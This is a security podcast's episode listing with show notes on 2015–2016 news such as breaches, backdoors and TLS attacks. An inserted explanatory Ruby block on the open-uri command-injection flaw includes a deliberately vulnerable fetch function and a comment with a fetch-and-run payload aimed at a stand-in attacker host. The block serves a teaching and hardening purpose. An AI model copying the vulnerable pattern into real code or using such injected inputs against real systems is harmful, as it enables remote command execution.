[ Subscribe to the Podcast: iTunes | Android | RSS ] News * Apple calls out FBI on iPhone decryption case * Trump calls for a boycott of Apple, from an iPhone * Judge Rules FBI Must Reveal Malware It Used to Hack Over 1,000 Computers * Wow. Someone hacked @linuxmint’s website and replaced ISOs with a backdoored version today http://blog.linuxmint.com/?p=2994 * This affects a universally used library (glibc) at a universally used protocol (DNS). Generic tools that we didn’...
Feb 23, 2016•19 min
News * Major Cisco ASA buffer overflow; patch now * Critical patches for Windows and Flash * The FBI is officially investigating Hillary Clinton regarding her private email server * NSA doing a complete reorg (basically combining defense and offense) […] -- :: T1SP: Episode 28 appeared originally on danielmiessler.com. :: Subscribe to Unsupervised Learning --- my weekly show where I handpick the best stories from infos...
Feb 15, 2016•42 min
News * Heavy surveillance around the Super Bowl * A new BlackEnergy spear phishing campaign is targeting more Ukrainian companies * Magento, the popular e-commerce CMS, releases fixes to critical XSS issues * Someone has posted private files of America’s […] -- :: T1SP: Episode 27 appeared originally on danielmiessler.com.
Feb 02, 2016•23 min
News * Backdoor found in AMX devices that run corporate and government conference rooms * Autopwn every Android device on your network using BetterCap and addJavascriptInterface * Cyber insurance challenged: a lawsuit for failing to cover a 500K loss in Houston […] -- :: T1SP: Episode 26 appeared originally on danielmiessler.com.
Jan 25, 2016•49 min
News * TrendMicro node.js server listening on localhost can execute commands; exposed to the internet * SSH backdoor found in Fortinet firewalls * SSH client vulnerability * Australia’s Cybercrime Online Reporting Network (ACORN) received over 39K reports of criminal activity in 2015 * Hyatt names 250 hotels hit by malware, includes the one for DerbyCon * Websense rebranding as Forcepoint, acquires Intel’s firewall busi...
Jan 19, 2016•26 min
News * Norse lays off 20 people; not clear what percentage that is; threat intel not going so well? * OPM declines to release details on its big breach * Juniper says it’s going to remove the code that it thinks was developed by the NSA to eavesdrop on traffic * CVE Details lists (OS X, iOS, Flash, Air, IE, Chrome, Firefox) as the software with the most issues * GM is going to do a bug bounty * The Hacker Manifesto turne...
Jan 11, 2016•28 min
News * Juniper backdoor; could have been found with diff; signs point to NSA * RCE on FireEye appliances * Hyatt got hacked; malware on POS * 45K drones registered with FAA within 2 days * Industry moving towards password-free logins; still single factor, now the factor is your device; although access to device could require factors * Microsoft will now tell you if your account has been targeted by government authoritie...
Jan 04, 2016•55 min
In this episode I explore the topic of Security and Obscurity by reading my popular essay on the topic. Notes * The intro track is from one of my favorite EDM artists: Zomby. The song is ‘Orion’, and it’s from the ‘With Love’ album. Highly recommended if you like chill EDM. Become a Member: https://danielmiessler.com/upgrade See omnystudio.com/listener for privacy information.
Dec 13, 2015•10 min
Topics for this episode: News * Stringing Shodan to exploitation * Why you need to check HaveIBeenPwned * Another DELL root cert hacked * ISIS OPSEC advice (data privacy, Tor, Cryptocat, Telegram, ProtonMail, GPS features on mobile devices, etc.) They also mention not to use Instagram because Facebook has a poor privacy record. * Obama wants to make it harder for terrorists to use technology to escape from justice * DHS...
Dec 13, 2015•18 min
Topics for this episode: News and analysis * Ads using high frequency sound to communicate across devices. The ultrasonic pitches are embedded into TV commercials or are played when a user encounters an ad displayed in a computer browser. While the sound can’t be heard by the human ear, nearby tablets and smartphones can detect it. When they do, browser cookies can now pair a single user to multiple devices and keep track of what TV commercials the person sees, how long the person watc...
Dec 07, 2015•24 min
Companies don't want employees, and they're doing their best to get rid of them. We should be getting ready for this.
Nov 17, 2015•4 min
Topics for this episode: News and analysis * A couple of months into my job with IOActive * Paris Attacks: resilience vs. prevention * Updating the OWASP IoT Project (no longer the Top 10); it’s an umbrella project. * Adding to the IoT project the SCADA Top 10 List (read the list), and Nabil Ouchn is going to be project leader on that project * Pentagon farms out coding to Russia * Crypto email service pays ransom, gets taken out anyway * Blackout Europe shows vulnerabilit...
Nov 16, 2015•31 min
Topics for this episode: News and analysis * Sonar framework * Schneider Electric SCADA issues revealed at DEFCON * Ashley Madison hack, extortion will become more common, passwords added to SecLists * Hackers attack PR firm and manipulate stocks * Uber is quadrupling their security staff in 2015 * Android vulnerabilities lately Ideas and commentary * Business-based hacking: extortion-based hacking, ransomware, prediction-based hacking, PR releases, etc. Find the leverage, then execute the hack ...
Aug 25, 2015•27 min
[ NOTE: There are spoilers below, not just for this episode but for the show in general. ] Enough people have asked me to start doing reviews of Mr. Robot episodes that I’m going to have a go at it. The deciding factor was the fact that I had such a strong desire to write during the third episode. I’m going to start here with thoughts on the show in general, not just on episode 3. Mr. Robot in general The character The main protagonist is an interesting character. He is what the writ...
Jul 19, 2015•19 min
Topics for this episode: Announcements * New desk, new mic setup News * SSL vuln spoofing issue, requires MITM * Sleepy Puppy XSS Payload Management Framework * Troy Hunt on tech presentations * Stock market attacked and taken down. Anonymous warned about it beforehand * OPM goes to 21.5 million cards; director steps down * People need to get fired for this stuff; it’s the only way anyone will care enough to do anything * National Guard announces data breach Comme...
Jul 12, 2015•26 min
Topics for this episode: * Hacking Team Hacked, show which oppressive governments bought their software * No exploits for non-jailbroken iPhone * The FBI spent 775K on Hacking Team software * Citi creating a digital currency, called Citicoin * Clinton attacking China on hacking, “Said they’re trying to hack into everything that doesn’t move.” * Eric Holder suggests that Snowden had a positive impact, and that an agreement could be reached * Critical bug in node.js pat...
Jul 07, 2015•7 min
Topics for this episode: * iOS flaw * The Chinese hacking campaign against the US * Breach at Recorded future * Hacking cars through key fobs * NSA/GCHQ hacking of people through security software * Snowden’s documents in the hands of the Chinese and Russians * Samsung re-enabling Windows Update * Mr. Robot * Blackhat/DEFCON Notes * The intro track is from one of my favorite EDM artists: Zomby . The song is ‘Orion’, and it’s from the ‘With Love’ album. Highly recommended if you like chill ...
Jun 29, 2015•14 min
Jun 15, 2015•23 min
Jun 12, 2015•43 min
* Singtel buys Trustwave * Snowden does interview with John Oliver * Check Point buys Lacoon * Everyone’s trying to do everything, which gives the big people a major advantage * China melted GitHub * MiTM’d Baidu traffic and modified its analytics JavaScript to make constant requests to GitHub * They did it because GitHub was hosting two mirror repos for content that is banned in China * Also highlights the need for encryption, so that the JS couldn’t ...
Apr 08, 2015•14 min
* Twitch, a game streaming service owned by Amazon, was hacked last week * Passwords, emails, usernames, addresses, phone numbers, dates of birth * Amazon bought them last year for almost 1 billion dollars * Bar Mitzvah attack on TLS * Requires that you can sniff traffic * Basically an RC4 problem * Solution is to remove it from your supported algorithms * GitHub has been hit by a massive DDoS attack * Apparently from China * CSRF vulnerability found in a wind turbine ...
Mar 30, 2015•17 min
* There was another SQL Injection bug found in SEO by Yoast * It required admins to click a malicious link * Was patched quickly * It’s the plugins that make WordPress vulnerable * Attackers are targeting gamers for ransomware * Virlock is one version of ransomware that not only locks the screen, but infects files * It’s also polymorphic, so it changes itself every time it runs * TeslaCrypt goes after gamers, which seems super smart because they are often a...
Mar 16, 2015•22 min
* Sorry about the audio last week; wireless headsets don’t compare to the Yeti * The CIA is focusing on cyberespionage in its new management * Anthem is refusing an audit by the OIG office–an org that audits health care groups that provide services to federal employees * Nothing says I’m guilty like refusing an audit * Reminds me of the Russians refusing the crash investigation in Game of Cards * There’s been a possible credit card breach at the Mandarin Ori...
Mar 09, 2015•13 min
* New SSL attack called FREAK * Has to do with downgrading RSA to deprecated, weak export-grade key lengths * Requires that the client and server are both vulnerable * The solution is to patch * Many orgs will also want to note which servers were vulnerable * The lesson is that you don’t reduce security to increase it * Backdoors x time = regret * Using Ruby’s open-uri could be dangerous * open-uri monkeypatches Kernel#open * open(params[:url]) can execute |ls * Hillary Clinton used a per...
Mar 03, 2015•16 min
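The open-uri item in the Mar 03, 2015 notes above is worth seeing in running code. What follows is an added example, not code from the show or from any project it mentions. Kernel#open treats a string that begins with "|" as a command to spawn, and until Ruby 3.0 requiring open-uri made that same Kernel#open fetch http(s) URLs as well, so a handler written as open(params[:url]) turns "|ls" into command execution on the server. The function names (unsafe_fetch, validate_url, safe_fetch, demo) and the sample inputs are constructed for this example; the hardened path parses first, allow-lists absolute http/https URLs with a host, and calls the #open that open-uri adds to URI::HTTP on the parsed object, never Kernel#open.

```ruby
require "open-uri"   # pulls in "uri" too; before Ruby 3.0 it also patched Kernel#open

# VULNERABLE (the pattern in the show notes): Kernel#open spawns a subprocess
# when its argument starts with "|", so user input such as "|ls" or
# "|curl attacker/x.sh | sh" executes on the server with the app's privileges.
def unsafe_fetch(user_input)
  open(user_input) { |io| io.read }
end

# HARDENED: parse first, then allow-list. Only absolute http(s) URLs with a
# host get through; pipes, bare filesystem paths, file:// and ftp:// all raise.
def validate_url(user_input)
  uri = begin
    URI.parse(user_input.to_s)
  rescue URI::InvalidURIError
    raise ArgumentError, "not a URL: #{user_input.inspect}"
  end
  # URI::HTTPS is a subclass of URI::HTTP, so this covers both schemes.
  unless uri.is_a?(URI::HTTP) && uri.host && !uri.host.empty?
    raise ArgumentError, "refusing #{user_input.inspect}: only absolute http(s) URLs"
  end
  uri
end

# #open here is the method open-uri adds to URI::HTTP; it fetches the URL held
# by the parsed object and never consults Kernel#open, so a leading "|" has no
# way to reach a shell. (This makes a real network request, so demo below
# deliberately does not call it.)
def safe_fetch(user_input)
  validate_url(user_input).open { |io| io.read }
end

# Constructed inputs (not captured from any real app) exercising both paths.
# Returns a hash rather than printing so the outcome can be checked.
def demo
  {
    unsafe: unsafe_fetch("|echo pwned"),                          # "pwned\n": the command ran
    pipe:   (validate_url("|echo pwned") rescue :rejected),       # :rejected
    path:   (validate_url("/etc/passwd") rescue :rejected),       # :rejected
    file:   (validate_url("file:///etc/passwd") rescue :rejected),# :rejected
    ok:     validate_url("https://example.com/report?id=7").host  # "example.com"
  }
end

puts demo.inspect
```

Run it with `ruby open_uri_demo.rb`; the :unsafe entry shows the shell command's output coming back through Kernel#open, while every non-http(s) input is rejected before anything is opened. The allow-list is on the parsed scheme and host rather than on a string prefix check, because "http://" can be smuggled past a naive prefix test in ways a parsed URI::HTTP object cannot.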
* New Stuxnet-like piece of malware was discovered * Was found by Kaspersky * Has infected thousands of computers, mostly in Iran * The malware is the most advanced ever found * Can hide on the computer even after reinstall * Many of the names used in the application are known NSA codenames, such as GROK * Wired said those targeted groups were Islamic scholars * The group is called Equation Group due to the encryption used to hide itself * Car washes hacked by Billy Rios * Bad web...
Feb 24, 2015•9 min
* Ukrainian banks hacked for up to 1 billion dollars * Evidently installed malware on bank admin machines using phishing * Not sure they have an FDIC * As if Ukraine didn’t have enough problems * 10 million password project * Mark Burnett posted 10 million password combinations * Went through a long explanation of why he was doing it * I’ve broken them up and put them in the SecLists project * Jeb Bush leaks personal data * Anthem may have been Heartbleed * Could ha...
Feb 17, 2015•12 min
* Anthem, the second largest healthcare company, had a major breach * They lost around 80 million socials, addresses, emails, etc., which is roughly double the Target breach * There’s speculation that it was China, trying to penetrate government, but it’s early * Watch for phishing scams related to it * The megabreaches continue…weee! * A WordPress plugin called FancyBox had a serious compromise in it last week, which affected thousands of websites * If you’re goi...
Feb 08, 2015•7 min
* GHOST bug in glibc’s gethostbyname() could affect millions of servers * Flaw is in glibc, which is used extensively by all Linux distributions * Patch and reboot using yum or aptitude * The US Army released Dshell, a network forensics framework * This is an interesting trend where we see tons of formerly secret groups flock to GitHub. Great to see * Reddit released its first transparency report last week * Says it received 55 requests for user information * Says it complied with 64% of state and federal reque...
Feb 02, 2015•8 min
* There was an issue with the Marriott website that exposed reservations and payment information. It’s now been fixed * Police are now using a new radar to see into people’s homes without a warrant * Security budgets are reportedly going up due to the mega-breaches in 2014 * Also leading to higher pay for CIOs * Anecdotally, I’d say it’s a pretty good time to be in infosec * A new security startup, PFP Cybersecurity, uses power consumption to detect malware ...
Jan 25, 2015•11 min
* UK police arrest 18-year-old in connection to PlayStation and Xbox attack * Major ASUS router bug * Local users can take full control without a password * Biggest issue there seems to be DNS hijacking * Legislative attacks on infosec profession and encryption * Anti-hacking law language ambiguous “according to owner” * Obama is said to agree with Cameron, but it’s complicated * Evidence of a plot is different than outlawing encryption * There’s other talk ...
Jan 19, 2015•16 min